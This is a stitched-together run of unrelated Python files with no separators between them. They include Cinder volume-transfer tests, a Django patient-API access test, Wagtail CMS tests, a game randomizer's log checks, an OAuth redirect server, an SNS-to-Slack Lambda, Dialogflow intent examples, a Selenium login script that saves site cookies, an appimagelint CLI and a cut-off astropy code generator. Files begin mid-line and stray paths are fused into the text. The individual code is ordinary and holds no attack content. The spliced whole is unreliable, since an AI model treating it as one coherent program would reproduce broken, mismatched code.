self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, volume_type_id=fake.VOLUME_TYPE_ID, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume.id, 'Description') fake_overs = ['per_volume_gigabytes'] fake_quotas = {'per_volume_gigabytes': 1} fake_usages = {} mock_quota_limit.side_effect = exception.OverQuota( overs=fake_overs, quotas=fake_quotas, usages=fake_usages) self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID self.assertRaises(exception.VolumeSizeExceedsLimit, tx_api.accept, self.ctxt, transfer['id'], transfer['auth_key']) # notification of transfer.accept is sent only after quota check # passes self.assertEqual(2, mock_notify.call_count) def test_transfer_get(self): tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume['id'], 'Description') t = tx_api.get(self.ctxt, transfer['id']) self.assertEqual(t['id'], transfer['id'], 'Unexpected transfer id') ts = tx_api.get_all(self.ctxt) self.assertEqual(1, len(ts), 'Unexpected number of transfers.') nctxt = context.RequestContext(user_id=fake.USER2_ID, project_id=fake.PROJECT2_ID) utils.create_volume(nctxt, updated_at=self.updated_at) 
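# The notification assertions in the transfer tests above follow a standard unittest.mock
# pattern: patch the notifier, then verify both the ordered calls and the total call count.
# A minimal self-contained illustration with a toy function (not the cinder API):
from unittest import mock

def do_transfer(ctxt, notify):
    notify(ctxt, "transfer.create.start")
    notify(ctxt, "transfer.create.end")

mock_notify = mock.Mock()
do_transfer("ctxt", mock_notify)
mock_notify.assert_has_calls([
    mock.call("ctxt", "transfer.create.start"),
    mock.call("ctxt", "transfer.create.end"),
])
assert mock_notify.call_count == 2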
self.assertRaises(exception.TransferNotFound, tx_api.get, nctxt, transfer['id']) ts = tx_api.get_all(nctxt) self.assertEqual(0, len(ts), 'Unexpected transfers listed.') @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_delete_transfer_with_deleted_volume(self, mock_notify): # create a volume volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) # create a transfer tx_api = transfer_api.API() transfer = tx_api.create(self.ctxt, volume['id'], 'Description') t = tx_api.get(self.ctxt, transfer['id']) self.assertEqual(t['id'], transfer['id'], 'Unexpected transfer id') calls = [mock.call(self.ctxt, mock.ANY, "transfer.create.start"), mock.call(self.ctxt, mock.ANY, "transfer.create.end")] mock_notify.assert_has_calls(calls) self.assertEqual(2, mock_notify.call_count) # force delete volume volume.destroy() # Make sure transfer has been deleted. self.assertRaises(exception.TransferNotFound, tx_api.get, self.ctxt, transfer['id']) @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_with_snapshots(self, mock_notify): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, volume_type_id=fake.VOLUME_TYPE_ID, updated_at=self.updated_at) utils.create_volume_type(self.ctxt.elevated(), id=fake.VOLUME_TYPE_ID, name="test_type") utils.create_snapshot(self.ctxt, volume.id, status='available') transfer = tx_api.create(self.ctxt, volume.id, 'Description') # Get volume and snapshot quota before accept self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID usages = db.quota_usage_get_all_by_project(self.ctxt, self.ctxt.project_id) self.assertEqual(0, usages.get('volumes', {}).get('in_use', 0)) self.assertEqual(0, usages.get('snapshots', {}).get('in_use', 0)) tx_api.accept(self.ctxt, transfer['id'], transfer['auth_key']) volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual(fake.PROJECT2_ID, volume.project_id) self.assertEqual(fake.USER2_ID, volume.user_id) calls = [mock.call(self.ctxt, mock.ANY, "transfer.accept.start"), mock.call(self.ctxt, mock.ANY, "transfer.accept.end")] mock_notify.assert_has_calls(calls) # The notify_about_volume_usage is called twice at create(), # and twice at accept(). 
self.assertEqual(4, mock_notify.call_count) # Get volume and snapshot quota after accept self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID usages = db.quota_usage_get_all_by_project(self.ctxt, self.ctxt.project_id) self.assertEqual(1, usages.get('volumes', {}).get('in_use', 0)) self.assertEqual(1, usages.get('snapshots', {}).get('in_use', 0)) @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_with_snapshots_invalid(self, mock_notify): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, volume_type_id=fake.VOLUME_TYPE_ID, updated_at=self.updated_at) utils.create_volume_type(self.ctxt.elevated(), id=fake.VOLUME_TYPE_ID, name="test_type") utils.create_snapshot(self.ctxt, volume.id, status='deleting') self.assertRaises(exception.InvalidSnapshot, tx_api.create, self.ctxt, volume.id, 'Description') @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') @mock.patch.object(db, 'volume_type_get', v2_fakes.fake_volume_type_get) @mock.patch.object(quota.QUOTAS, 'reserve') def test_transfer_accept_with_detail_records(self, mock_notify, mock_type_get): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume.id, 'Description') self.assertEqual(volume.project_id, transfer['source_project_id']) self.assertIsNone(transfer['destination_project_id']) self.assertFalse(transfer['accepted']) # Get volume and snapshot quota before accept self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID tx_api.accept(self.ctxt, transfer['id'], transfer['auth_key']) xfer = db_api.model_query(self.ctxt, models.Transfer, read_deleted='yes' ).filter_by(id=transfer['id']).first() self.assertEqual(volume.project_id, xfer['source_project_id']) self.assertTrue(xfer['accepted']) self.assertEqual(fake.PROJECT2_ID, xfer['destination_project_id']) from rest_framework.test import APITestCase,APIClient from django.urls import reverse from django.contrib.auth.models import User from django.contrib.auth.hashers import make_password from .models import Patient from customer.models import Customer import datetime import json class PatientTestCase(APITestCase): """ Test normal creating user procedural. 
""" def setUp(self): self.client = APIClient() user = User(username='',email='', password=make_password('/.,')) user.save() self.customer = Customer(user=user) self.customer.save() hacker_user = User(username='',email='',password=make_password('/.')) hacker_user.save() self.hacker = Customer(user=hacker_user) self.hacker.save() login_data = { 'email':'', 'password':'/.,' } login_url = reverse('customer_login') login_response = self.client.post(login_url,login_data,format='json') self.assertEqual(login_response.status_code,200) self.customer_id = json.loads(login_response.content)['customer_id'] def test_create_patient(self): # print(self.client.cookies) for i in range(3): payload = { 'customer_id':self.customer_id, 'first_name':'demo%d'%i, 'last_name':'patient%d'%i, 'first_name_pinyin':'pin%d'%i, 'last_name_pinyin':'yin%d'%i, 'gender':0, 'birthdate':datetime.date.today(), 'relationship':0, 'passport':'12345' } url = reverse('patient-list',kwargs={'customer_id':self.customer_id}) response = self.client.post(url,payload,format='json') # print(response.content) self.assertEqual(response.status_code,201) # print(Patient.objects.filter(customer_id=self.customer.id)) def test_normal_list(self): self.test_create_patient() url = reverse('patient-list',kwargs={'customer_id':self.customer_id}) response = self.client.get(url) self.assertEqual(response.status_code,200) print(json.loads(response.content)) def test_illegal_list(self): self.test_create_patient() self.client.logout() self.client.force_login(self.hacker.user) url = reverse('patient-list',kwargs={'customer_id':self.customer_id}) response = self.client.get(url) self.assertEqual(response.status_code,403) 0 # Title : TODO # Objective : TODO # Created by: Wenzurk # Created on: 2018/2/2 # message = "One of Python's strengths is its diverse community." # print(message) # message = 'One of Python's strengths is its diverse community.' # print(message)def maximum_no_of_tasks(MaxNActive, waitingPeriod): """maintain a maximum number of active tasks _source: , UNC Postdoc at Global Hydrology Lab, https://github.com/seanyx""" time.sleep(10) ## initialize submitting jobs ts = list(ee.batch.Task.list()) NActive = 0 for task in ts: if ('RUNNING' in str(task) or 'READY' in str(task)): NActive += 1 ## wait if the number of current active tasks reach the maximum number ## defined in MaxNActive while (NActive >= MaxNActive): time.sleep(waitingPeriod) # if reach or over maximum no. 
of active tasks, wait for 2min and check again ts = list(ee.batch.Task.list()) NActive = 0 for task in ts: if ('RUNNING' in str(task) or 'READY' in str(task)): NActive += 1 return()"""Tests for CMS app API functionality""" import pytest from django.contrib.contenttypes.models import ContentType from wagtail.core.models import Page from wagtail_factories import PageFactory from cms.api import ( ensure_home_page_and_site, get_wagtail_img_src, ensure_resource_pages, ensure_product_index, get_home_page, RESOURCE_PAGE_TITLES, ) from cms.exceptions import WagtailSpecificPageError from cms.factories import HomePageFactory, CoursePageFactory from cms.models import HomePage, ResourcePage, CourseIndexPage, HomeProductLink @pytest.mark.django_db def test_get_home_page(): """ get_home_page should fetch a Page object for the home page or raise exceptions if certain conditions are met """ with pytest.raises(Page.DoesNotExist): get_home_page() assert get_home_page(raise_if_missing=False) is None # Orphaned home page (no HomePage record associated with the Page record orphaned_home_page = PageFactory.create( content_type=ContentType.objects.get_for_model(HomePage) ) with pytest.raises(WagtailSpecificPageError): get_home_page(check_specific=True) assert get_home_page() == orphaned_home_page @pytest.mark.django_db def test_get_home_page_specific(): """ get_home_page should fetch a Page object successfully if check_specific=True and there is a HomePage record associated with that Page """ home_page = HomePageFactory.create() returned_home_page = get_home_page(check_specific=True) assert home_page.page_ptr == returned_home_page @pytest.mark.django_db def test_ensure_home_page_and_site(): """ ensure_home_page_and_site should make sure that a home page is created if one doesn't exist, it is set to be a child of the root, and the default Wagtail page is deleted. 
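# A standalone sketch of the throttling idea in maximum_no_of_tasks above: poll a
# "how many jobs are active" callable and sleep until the count drops below the cap.
# count_active is a stand-in assumption for the ee.batch.Task.list() scan the original
# performs (which also needs `import time` and `import ee` to run as written).
import time

def wait_for_capacity(count_active, max_active, poll_seconds=30):
    while count_active() >= max_active:
        time.sleep(poll_seconds)

# Example with a toy sequence of active-task counts:
counts = iter([3, 3, 2, 1])
wait_for_capacity(lambda: next(counts), max_active=2, poll_seconds=0)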
""" home_page_qset = Page.objects.filter( content_type=ContentType.objects.get_for_model(HomePage) ) wagtail_default_page_qset = Page.objects.filter( depth=2, content_type=ContentType.objects.get_for_model(Page) ) assert home_page_qset.exists() is False assert wagtail_default_page_qset.exists() is True ensure_home_page_and_site() assert wagtail_default_page_qset.exists() is False home_page = home_page_qset.first() assert home_page is not None home_page_parents = home_page.get_ancestors() assert home_page_parents.count() == 1 assert home_page_parents.first().is_root() is True # Make sure the function is idempotent ensure_home_page_and_site() assert home_page_qset.count() == 1 def test_get_wagtail_img_src(settings): """get_wagtail_img_src should return the correct image URL""" settings.MEDIA_URL = "/mediatest/" img_path = "/path/to/my-image.jpg" img_hash = "abc123" home_page = HomePageFactory.build( hero__file__filename=img_path, hero__file_hash=img_hash ) img_src = get_wagtail_img_src(home_page.hero) assert img_src == f"{img_path}?v={img_hash}" @pytest.mark.django_db def test_ensure_resource_pages(mocker): """ ensure_resource_pages should create resource pages if they don't already exist """ patched_get_home_page = mocker.patch( "cms.api.get_home_page", return_value=HomePageFactory.create() ) expected_resource_pages = len(RESOURCE_PAGE_TITLES) resource_page_qset = Page.objects.filter( content_type=ContentType.objects.get_for_model(ResourcePage) ) assert resource_page_qset.exists() is False assert resource_page_qset.count() == 0 ensure_resource_pages() patched_get_home_page.assert_called_once() assert resource_page_qset.exists() is True assert resource_page_qset.count() == expected_resource_pages assert sorted( [resource_page.title for resource_page in resource_page_qset] ) == sorted(RESOURCE_PAGE_TITLES) # Make sure the function is idempotent ensure_resource_pages() assert resource_page_qset.count() == expected_resource_pages @pytest.mark.django_db def test_ensure_product_index(mocker): """ ensure_product_index should make sure that a course index page exists and that all course detail pages are nested under it """ home_page = HomePageFactory.create() patched_get_home_page = mocker.patch( "cms.api.get_home_page", return_value=home_page ) existing_course_page = CoursePageFactory.create(parent=home_page) course_index_qset = Page.objects.filter( content_type=ContentType.objects.get_for_model(CourseIndexPage) ) assert existing_course_page.get_parent() == home_page assert course_index_qset.exists() is False ensure_product_index() patched_get_home_page.assert_called_once() course_index_page = course_index_qset.first() assert course_index_page is not None course_index_children_qset = course_index_page.get_children() assert list(course_index_children_qset.all()) == [existing_course_page.page_ptr] # Make sure the function is idempotent ensure_product_index() assert list(course_index_children_qset.all()) == [existing_course_page.page_ptr] @pytest.mark.django_db def test_home_page_featured_products(mocker): """test home page is loading featured product""" home_page = HomePageFactory.create() patched_get_home_page = mocker.patch( "cms.api.get_home_page", return_value=home_page ) course_page = CoursePageFactory.create(parent=home_page) # make sure featured products are listing HomeProductLink.objects.create(page=home_page, course_product_page=course_page) featured_products = home_page.products assert len(featured_products) == 1 run = course_page.product.first_unexpired_run assert featured_products == [ 
{ "title": course_page.title, "description": course_page.description, "feature_image": course_page.feature_image, "start_date": run.start_date if run is not None else None, "url_path": course_page.get_url(), } ] @pytest.mark.django_db def test_home_page_featured_products_sorting(mocker): """tests that featured products are sorted in ascending order""" home_page = HomePageFactory.create() patched_get_home_page = mocker.patch( "cms.api.get_home_page", return_value=home_page ) course_pages = CoursePageFactory.create_batch(2, parent=home_page) page_data = [] for course_page in course_pages: HomeProductLink.objects.create(page=home_page, course_product_page=course_page) run = course_page.product.first_unexpired_run page_data.append( { "title": course_page.title, "description": course_page.description, "feature_image": course_page.feature_image, "start_date": run.start_date if run is not None else None, "url_path": course_page.get_url(), } ) page_data = sorted( page_data, key=lambda item: (item["start_date"] is None, item["start_date"]), ) featured_products = home_page.products assert len(featured_products) == 2 assert featured_products == page_data import sys import os sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))) from ssrando import Randomizer from options import Options import time import json def check_logs(): opts = Options() opts.update_from_permalink("rQEAAASmAw==") opts.set_option("dry-run", True) for i in range(5): opts.set_option("seed", i) rando = Randomizer(opts) old_time = time.process_time() rando.logic.randomize_items() print(time.process_time() - old_time) prog_spheres = rando.calculate_playthrough_progression_spheres() with open(f"testlogs/log_{i:02}.json", "r") as f: should_prog_spheres = json.load(f) assert prog_spheres == should_prog_spheres def write_logs(): opts = Options() opts.update_from_permalink("rQEAAASmAw==") opts.set_option("dry-run", True) for i in range(5): opts.set_option("seed", i) rando = Randomizer(opts) old_time = time.process_time() rando.logic.randomize_items() print(time.process_time() - old_time) prog_spheres = rando.logic.calculate_playthrough_progression_spheres() # prog_spheres = rando.calculate_playthrough_progression_spheres() # with open(f'testlogs/log2_{i:02}.json','w') as f: # json.dump(prog_spheres, f, indent=2, sort_keys=True) def test_woth(): opts = Options() opts.update_from_permalink("rQEAAASmAw==") opts.set_option("dry-run", True) for i in range(5): opts.set_option("seed", i) rando = Randomizer(opts) rando.logic.randomize_items() woth_items = {} not_woth_prog = {} # check for every progress item, if it's hard required for loc in rando.logic.item_locations: item = rando.logic.done_item_locations[loc] if item in rando.logic.all_progress_items: if rando.logic.can_finish_without_locations([loc]): not_woth_prog[loc] = item else: woth_items[loc] = item # with open(f'testlogs/log3_{i:02}.json','w') as f: # json.dump({'not':not_woth_prog, 'woth': woth_items}, f, indent=2) def test_barren(): opts = Options() opts.update_from_permalink("rQEAAASmAw==") opts.set_option("dry-run", True) for i in range(5): opts.set_option("seed", i) rando = Randomizer(opts) rando.logic.randomize_items() rando.logic.get_barren_regions() # with open(f'testlogs/log4_{i:02}.json','w') as f: # json.dump(rando.logic.get_barren_regions(), f, indent=2) from onshape_client.compatible_imports import HTTPServer, HTTPHandler, sendable def start_server(authorization_callback, open_grant_authorization_page_callback): """ :param 
authorization_callback: The function to call once with the authorization URL response :param open_grant_authorization_page_callback: The function to call when the server starts - for example opening a webpage :return: """ ServerClass = MakeServerClass(open_grant_authorization_page_callback) server = ServerClass( ("localhost", 9000), MakeHandlerWithCallbacks(authorization_callback) ) server.serve_forever() def MakeServerClass(open_grant_authorization_page_callback): class OAuth2RedirectServer(HTTPServer, object): def server_activate(self): super(OAuth2RedirectServer, self).server_activate() open_grant_authorization_page_callback() return OAuth2RedirectServer def MakeHandlerWithCallbacks(authorization_callback): class OAuth2RedirectHandler(HTTPHandler): def do_GET(self): try: # Say we are at an https port so that OAuth package doesn't complain. This isn't a security concern because # it is just so that the authorization code is correctly parsed. print("path:"+str(self.path)) authorization_callback(authorization_response="https://localhost" + self.path) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() content = """ Success!

You successfully authorized the application, and your authorization url is: {}

You may close this tab.

""".format( self.path ) self.wfile.write(sendable(content)) except BaseException as e: self.send_response(500) self.send_header("Content-type", "text/html") self.end_headers() content = """ Error!

Something happened and here is what we know: {}

You may close this tab.

""".format( e ) self.wfile.write(sendable(content)) import threading assassin = threading.Thread(target=self.server.shutdown) assassin.daemon = True assassin.start() return OAuth2RedirectHandler # -*- coding: utf-8 -*- def main(): n = int(input()) h = list(map(int, input().split())) if n == 1: print('Yes') exit() for i in range(n - 1, 0, -1): if h[i] >= h[i - 1]: continue else: if h[i] - h[i - 1] == -1: h[i - 1] -= 1 else: print('No') exit() print('Yes') if __name__ == '__main__': main() import json import os from base64 import b64decode import boto3 import requests def sns_message_to_slack(event, context): message = event["Records"][0]["Sns"]["Message"] subject = event["Records"][0]["Sns"]["Subject"] if subject: payload = { "text": subject, "blocks": [ {"type": "section", "text": {"text": message, "type": "mrkdwn"}} ], } else: payload = {"text": message} webhook = ( boto3.client("kms") .decrypt(CiphertextBlob=b64decode(os.environ["ENCRYPTED_SLACK_WEBHOOK"]))[ "Plaintext" ] .decode("utf-8") .strip() ) requests.post(webhook, json=payload) response = {"statusCode": 200, "body": ""} return response Chapter16/cf_rfem_hist_price/venv/lib/python3.6/tempfile.py /home/wai/anaconda3/lib/python3.6/tempfile.pydario-chiappetta/dialogflow_agents """ This module demonstrates the use of intent **relations** to create complex conversation flows. .. note:: Intent relations are under definition, they will be extended in next releases. Let's break down a complex interaction involving :mod:`shop` intents. #. .. code-block:: text U: I want a fish A: What sort of fish do you want? Standard Intent :class:`OrderFish` starts the conversation. .. autoclass:: OrderFish #. .. code-block:: text U: A kipper A: Kipper, good choice. Adding 1 to cart Intent :class:`OrderFishAnswerKipper` follows :class:`OrderFish`. This means that the first can't be predicted if the latter wasn't predicted recently; this makes sense because an utterance like *"a kipper"* would sound really weird without context. Note that :class:`OrderFishAnswerKipper` is a subclass of :class:`OrderKipper`, and therefore inherits its :meth:`OrderKipper.fulfill` method. Check out the **source code** of the intents below to see how the *follow* relation is implemented. .. autoclass:: OrderKipper :members: .. autoclass:: OrderFishAnswerKipper :members: #. .. code-block:: text U: Actually I want more A: How many would you like? :class:`ChangeAmount` follows :class:`OrderKipper`. Since :class:`OrderFishAnswerKipper` is a subclass of :class:`OrderKipper`, our agent can predict :class:`ChangeAmount` at this point of the conversation. However, this intent defines a required parameter :attr:`ChangeAmount.amount`. Since *amount* can't be tagged in the user utterance, the Agent will respond with one of the slot filling prompts for parameter "amount" (see :mod:`intents.language`). .. autoclass:: ChangeAmount :members: #. .. code-block:: text U: 3 please A: Alright, I changed the amount to 3 User fills the slot, and :class:`ChangeAmount` can finally be predicted. .. autoclass:: CartApi :members: """ from dataclasses import dataclass from intents import Intent, Sys, follow # # Helpers # class CartApi: """ A mock API for a Customer cart. In real life, this connects to a service of some sort. 
""" def add(self, item: str, amount: int): """ Add an item to cart Args: item: Name of the item to add amount: Amount to add """ print(f"If I was real, I'd add {amount} {item} to cart") def update(self, item: str, amount: int): """ Update an item in cart Args: item: Name of the item to update amount: New amount to set """ print(f"If I was real, I'd update the amount of {item} to {amount}") # # Intents # @dataclass class OrderFish(Intent): """ | U: I'd like to buy a fish please | A: What sort of fish would you like? Args: amount: The amount of fish to buy """ lifespan = 3 amount: Sys.Integer = 1 @dataclass class OrderKipper(OrderFish): """ | U: I'd like to buy a kipper | A: Alright, adding 1 kipper to cart Args: amount: The amount of kipper to buy """ def fulfill(self, context, *args): """ Use :class:`CartApi` to add kippers to cart. The amount is specified by :attr:`OrderKipper.amount` """ cart = CartApi() cart.add('kipper', self.amount) @dataclass class OrderFishAnswerKipper(OrderKipper): """ | ("...what sort of fish would you like?") | U: kipper | A: Kipper, good choice Args: amount: The amount of kipper to buy parent_order_fish: The OrderFish intent from context """ parent_order_fish: OrderFish = follow() @dataclass class ChangeAmount(Intent): """ | ("...adding one kipper to cart") | U: actually, make it 2 | A: Sure, 2 kippers for you Args: amount: The new amount of kipper. Note that this overwrites all the other values for parameter "amount" in context, even if they come from other intents parent_order_kipper: The OrderKipper intent from context """ amount: Sys.Integer parent_order_kipper: OrderKipper = follow(new_lifespan=2) def fulfill(self, context, *args): """ Use :class:`CartApi` to update the amount of kippers in cart to :attr:`ChangeAmount.amount` """ cart = CartApi() cart.update('kipper', self.amount) import json import os from pathlib import Path def removeprefix(string, prefix): if string.startswith(prefix): string = string[len(prefix):] return string def removesuffix(string, suffix): if string.endswith(suffix): string = string[:-len(suffix)] return string def convert_path(original_path, data_path): prefix_to_remove = "dumped/mc4_processed_data/" suffix_to_remove = ".bin" return data_path / removesuffix(removeprefix(original_path, prefix_to_remove), suffix_to_remove) def main(): """Write to """ data_path = Path(os.environ["six_ALL_CCFRSCRATCH"]) / "datasets-custom" / "mc4" / "mc4_preprocessing" output_path = Path(os.environ["six_ALL_CCFRSCRATCH"]) / "checkpoints" / "tr5-1B3-multilingual" / "dataset_probabilities.txt" probabilies_path = data_path / "sample_iterator_probs" / "iterator_selection_prob.0.3.train.json" with open(probabilies_path, "r") as fprob: probabilities = json.load(fprob) # Format probabilities dictionary to store path in key and probability as value probabilities = { convert_path(key, data_path): value[0] for key, value in probabilities.items() } with open(output_path, "w") as fout: fout.write(" ".join([f"{prob} {path}" for path, prob in probabilities.items()])) pass if __name__ == "__main__": main() zhongjianru/JinJiangNovelmain/login.py import utils import time import os from selenium import webdriver from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By cookie_file = './files/cookies.txt' login_url = 'http://my.jjwxc.net/' chap_url = 'http://my.jjwxc.net/onebook_vip.php?novelid=3288706&chapterid=22' # 新增:读取本地 cookies 文件 def read_cookies(): if 
os.path.exists(cookie_file): with open(cookie_file, 'r+') as f: cookies = f.read() else: with open(cookie_file, 'w+') as f: cookies = '' f.write(cookies) print('reading', cookie_file, '...') return cookies # 测试本地 cookies 是否可用 def test_cookies(cookies): headers = utils.get_headers(cookies) soup = utils.get_url(chap_url, headers=headers) noveltext = '' isvalid = True try: noveltext = soup.select('div.noveltext')[0] except: pass if noveltext == '': isvalid = False return isvalid # 用户登录 def user_login(username, password): # 打开登录页面 opt = webdriver.ChromeOptions() # opt.add_argument('--headless') driver = webdriver.Chrome(options=opt, executable_path='/Users/kinyuchung/Downloads/chromedriver') driver.get(login_url) # 等待页面加载 exp = EC.presence_of_element_located((By.ID, 'jj_login')) wait = WebDriverWait(driver, 60) tar = wait.until(exp) # 登录 btn_login = driver.find_element_by_xpath('//*[@id="jj_login"]') btn_login.click() # 用户名 input_name = driver.find_element_by_id('loginname') input_name.clear() input_name.send_keys(username) # 密码 input_pwd = driver.find_element_by_id('loginpassword') input_pwd.clear() input_pwd.send_keys(password) # 同意用户协议 input_keep = driver.find_element_by_id('login_registerRule') input_keep.click() # 保持登入状态 input_keep = driver.find_element_by_id('cookietime') input_keep.click() time.sleep(2) btn_submit = driver.find_element_by_xpath('//*[@id="login_form"]/ul/div[@id="logininput"]/li[3]/input') btn_submit.click() time.sleep(5) # 访问 vip 章节,获取 cookie driver.get(chap_url) cookie_list = driver.get_cookies() # 格式化打印cookie cookie_dict = {} cookies = '' for one in cookie_list: cookie_dict[one['name']] = one['value'] cookies = cookies + one['name'] + '=' + one['value'] + '; ' cookies = cookies.rstrip('; ') # 写入 cookie with open(cookie_file, mode='w+') as f: f.write(cookies) # 退出浏览器窗口 driver.quit() # 获取可用 cookies def get_cookies(username, password): cookies = read_cookies() isvalid = test_cookies(cookies) if isvalid: print('cookie is valid.') else: print('cookie is invalid, start to login...') user_login(username, password) print('login successfully.', cookie_file, 'write done.') cookies = read_cookies() return cookies import argparse import logging import os import sys from appimagelint.services.checks_manager import ChecksManager from .cache.runtime_cache import AppImageRuntimeCache from .reports import JSONReport from .services.result_formatter import ResultFormatter from .models import AppImage from . 
import _logging from .checks import IconsCheck, GlibcABICheck, GlibcxxABICheck, DesktopFilesCheck def get_version(): try: import pkg_resources version = pkg_resources.require("appimagelint")[0].version except ImportError: version = "unknown" APPDIR = os.environ.get("APPDIR", None) git_commit = "unknown" if APPDIR is not None: try: with open(os.path.join(APPDIR, "commit")) as f: git_commit = f.read().strip(" \n\r") except FileNotFoundError: pass version += "-git" + git_commit return version def parse_args(): parser = argparse.ArgumentParser( prog="appimagelint", description="Run compatibility and other checks on AppImages automatically, " "and provide human-understandable feedback" ) parser.add_argument("--version", dest="display_version", action="version", version=get_version(), help="Display version and exit" ) parser.add_argument("--debug", dest="loglevel", action="store_const", const=logging.DEBUG, default=logging.INFO, help="Display debug messages") parser.add_argument("--log-source-location", dest="log_message_locations", action="store_const", const=True, default=False, help="Print message locations (might be picked up by IDEs to allow for jumping to the source)") parser.add_argument("--log-timestamps", dest="log_timestamps", action="store_const", const=True, default=False, help="Log timestamps (useful for debugging build times etc.)") parser.add_argument("--force-colors", dest="force_colors", action="store_const", const=True, default=False, help="Force colored output") parser.add_argument("--json-report", dest="json_report", nargs="?", default=None, help="Write results to file in machine-readable form (JSON)") parser.add_argument("--check", dest="check_id", nargs="?", default=None, help="Check to run (default: all)") parser.add_argument("path", nargs="+", help="AppImage to review") args = parser.parse_args() return args def run(): ChecksManager.init() args = parse_args() if getattr(args, "display_version", False): print(get_version()) return # setup _logging.setup( args.loglevel, with_timestamps=args.log_timestamps, force_colors=args.force_colors, log_locations=args.log_message_locations, ) # get logger for CLI logger = _logging.make_logger("cli") # need up to date runtime to be able to read the mountpoint from stdout (was fixed only recently) # also, it's safer not to rely on the embedded runtime custom_runtime = AppImageRuntimeCache.get_data() # results logs are written immediately, but maybe we want to generate additional reports # for this purpose, we collect all results results = {} try: for path in args.path: results[path] = {} logger.info("Checking AppImage {}".format(path)) appimage = AppImage(path, custom_runtime=custom_runtime) kwargs = dict() if args.force_colors: kwargs["use_colors"] = True formatter = ResultFormatter(**kwargs) if args.check_id: checks_ids = [args.check_id] else: checks_ids = ChecksManager.list_checks() for check_id in checks_ids: check = ChecksManager.get_instance(check_id, appimage) logger.info("Running check \"{}\"".format(check.name())) results[path][check] = [] for testres in check.run(): results[path][check].append(testres) check.get_logger().info(formatter.format(testres)) if args.json_report: report = JSONReport(results) report.write(args.json_report) except KeyboardInterrupt: logger.critical("process interrupted by user") sys.exit(2) astropy/utils/codegen.py # -*- coding: utf-8 -*- # Licensed under a 3-clause BSD style license - see LICENSE.rst """Utilities for generating new Python code at runtime.""" import inspect import itertools import 
keyword import os import re import textwrap from .introspection import find_current_module __all__ = ['make_function_with_signature'] _ARGNAME_RE = re.compile(r'^[A-Za-z][A-Za-z_]*') """ Regular expression used my make_func which limits the allowed argument names for the created function. Only valid Python variable names in the ASCII range and not beginning with '_' are allowed, currently. """ def make_function_with_signature(func, args=(), kwargs={}, varargs=None, varkwargs=None, name=None): """ Make a new function from an existing function but with the desired signature. The desired signature must of course be compatible with the arguments actually accepted by the input function. The ``args`` are strings that should be the names of the positional arguments. ``kwargs`` can map names of keyword arguments to their default values. It may be either a ``dict`` or a list of ``(keyword, default)`` tuples. If ``varargs`` is a string it is added to the positional arguments as ``*``. Likewise ``varkwargs`` can be the name for a variable keyword argument placeholder like ``**``. If not specified the name of the new function is taken from the original function. Otherwise, the ``name`` argument can be used to specify a new name. Note, the names may only be valid Python variable names. """ pos_args = [] key_args = [] if isinstance(kwargs, dict): iter_kwargs = kwargs.items() else: iter_kwargs = iter(kwargs) # Check that all the argument names are valid for item in itertools.chain(args, iter_kwargs): if isinstance(item, tuple): argname = item[0] key_args.append(item) else: argname = item pos_args.append(item) if keyword.iskeyword(argname) or not _ARGNAME_RE.match(argname): raise SyntaxError(f'invalid argument name: {argname}') for item in (varargs, varkwargs): if item is not None: if keyword.iskeyword(item) or not _ARGNAME_RE.match(item): raise SyntaxError(f'invalid argument name: {item}') def_signature = [', '.join(pos_args)] if varargs: def_signature.append(f', *{varargs}') call_signature = def_signature[:] if name is None: name = func.__name__ global_vars = {f'__{name}__func': func} local_vars = {} # Make local variables to handle setting the default args for idx, item in enumerate(key_args): key, value = item default_var = f'_kwargs{idx}' local_vars[default_var] = value def_signature.append(f', {key}={default_var}') call_signature.append(', {0}={0}'.format(key)) if varkwargs: def_signature.append(f', **{varkwargs}') call_signature.append(f', **{varkwargs}') def_signature = ''.join(def_signature).lstrip(', ') call_signature = ''.join(call_signature).lstrip(', ') mod = find_current_module(2) frm = inspect.currentframe().f_back if mod: filename = mod.__file__ modname = mod.__name__ if filename.endswith('.pyc'): filename = os.path.splitext(filename)[0] + '.py' else: filename = '' modname = '__main__' # Subtract 2 from the line number since the length of the template itself # is two lines. Therefore we have to subtract those off in order for the # pointer in tracebacks from __{name}__func to point to the right spot. lineno = frm.f_lineno - 2 # The lstrip is in case there were *no* positional arguments (a rare case) # in any context this will actually be used... 
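    # A hedged illustration with hypothetical names: make_function_with_signature(
    # f, args=('a',), kwargs={'b': 1}, name='g') fills the template below in as
    #
    #     def g(a, b=_kwargs0):
    #         return __g__func(a, b=b)
    #
    # where _kwargs0 is a local holding the default value and __g__func is the
    # wrapped input function stored in global_vars.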
